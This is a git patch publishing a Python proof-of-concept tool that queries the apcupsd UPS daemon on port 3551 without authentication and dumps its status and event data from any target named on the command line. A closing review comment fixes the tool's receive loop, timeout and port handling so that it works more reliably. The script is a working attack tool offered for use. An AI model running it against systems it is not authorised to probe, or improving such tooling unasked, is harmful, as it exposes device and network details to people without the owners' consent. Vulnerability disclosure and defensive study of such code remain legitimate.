From 00d25aece086780b090ffb584ec65027a047fd70 Mon Sep 17 00:00:00 2001
From: dash
Date: Thu, 13 Jun 2019 11:06:44 +0200
Subject: [PATCH] disclosure code published
---
apcupsd_disclosure.py | 94 +++++++++++++++++++++++++++++++++++++++++++
1 file changed, 94 insertions(+)
create mode 100755 apcupsd_disclosure.py
diff --git a/apcupsd_disclosure.py b/apcupsd_disclosure.py
new file mode 100755
index 0000000..be132a9
--- /dev/null
+++ b/apcupsd_disclosure.py
@@ -0,0 +1,94 @@
+#!/usr/bin/env python3
+#
+# Unauthenticated Information Disclosure in apcupsd of APC UPS
+# dash@undisclose.de
+#
+
+import os
+import sys
+import socket
+import string
+import argparse
+
+status = "\x00\x06\x73\x74\x61\x74\x75\x73".encode()
+events = "\x00\x06\x65\x76\x65\x6e\x74\x73".encode()
+protoend = "\x00\x00".encode()
+
+def socket_go(target,port,mode):
+
+ sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+
+ try:
+ sock.connect((target,port))
+ sock.send(mode)
+ except ConnectionRefusedError as e:
+ print ("[-] Target: %s:%d - %s " % (target,port,e))
+ sys.exit(1)
+ except TimeoutError as e:
+ print ("[-] Target: %s:%d - %s " % (target,port,e))
+ sys.exit(1)
+
+ out=""
+ while [ 1 ]:
+ data = sock.recv(4096)
+ out = out + data.decode()
+ if len(data) == 0:
+ break
+ elif data.find(protoend)>0:
+ break
+ return out
+
+def parse_output(out):
+ ''' basically remove non-printable protocol parts and interpret newlines ;)'''
+ output = ''.join([x for x in out if x in string.printable])
+ print(output)
+
+def run(args):
+
+ target = args.target
+ port = args.port
+ mode = args.mode
+
+ if mode == "status":
+ out=socket_go(target,port,status)
+ elif mode == "events":
+ out=socket_go(target,port,events)
+ else:
+ print("Sorry, unknown mode %s" % mode)
+ print("Supported modes:\n* status\n* events\n")
+ sys.exit(1)
+
+ printme=parse_output(out)
+
+ print("Let's move on.")
+
+
+
+def main():
+ ''' we got a main :)'''
+
+ __tool__ = 'apcupsd_disclosure.py'
+ __version__ = '0.1'
+ __author__ = 'dash@undisclose.de'
+ __date__ = 'June 2019'
+
+ parser_desc = 'Lil\' tool for Information Disclosure of apcupsd'
+ prog_desc = __tool__ + ' ' + __version__ + ' ' + __author__ + ' ' + __date__
+ parser = argparse.ArgumentParser(prog = prog_desc, description=parser_desc)
+
+ parser.add_argument('-m','--mode',action="store",dest='mode',required=False,help='define the mode, two modes exist: "status" and "events", default is "status"', default="status")
+ parser.add_argument('-t','--target',action="store",dest='target',required=True,help='define the target', default=False)
+ parser.add_argument('-p','--port',action="store",dest='port',required=False,help='define the target port', default=3551)
+
+ if(len(sys.argv)<2):
+ print("Sorry, to few arguments")
+ sys.exit(1)
+
+ args = parser.parse_args()
+
+ run(args)
+
+if __name__ == "__main__":
+ main()
+
+
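Review bot: In socket_go the end-of-reply test `elif data.find(protoend)>0:` misses a `\x00\x00` terminator that lands at offset 0 of a recv() chunk or straddles two chunks, and `out = out + data.decode()` decodes every raw chunk on its own, so a multi-byte or non-UTF-8 byte cut at a chunk boundary raises an uncaught UnicodeDecodeError; accumulate bytes, search the whole buffer with `!= -1`, and decode once at the end. The socket also gets no timeout and is never closed, so the `except TimeoutError` branch cannot fire against a host that silently drops packets and the tool blocks indefinitely (on Python < 3.10 a socket timeout raises `socket.timeout`, which is not a `TimeoutError`). Separately, the `-p/--port` add_argument in main lacks `type=int`, so a port given on the command line arrives as a string and `sock.connect((target,port))` raises TypeError — only the integer default 3551 works; add `type=int` to that call. The rewrite below keeps the connect/send error handling untouched and only replaces the receive loop; with the timeout set, a stalled reply surfaces as a timeout from recv() instead of a hang.
```python
def socket_go(target,port,mode):
    sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    sock.settimeout(10)  # without a timeout the TimeoutError branch below never fires
    # … unchanged: connect/send and the two except branches …
    buf = b""
    while True:
        data = sock.recv(4096)
        if not data:
            break
        buf += data
        if buf.find(protoend) != -1:  # terminator may sit at offset 0 or span chunks
            break
    sock.close()
    return buf.decode(errors="replace")
```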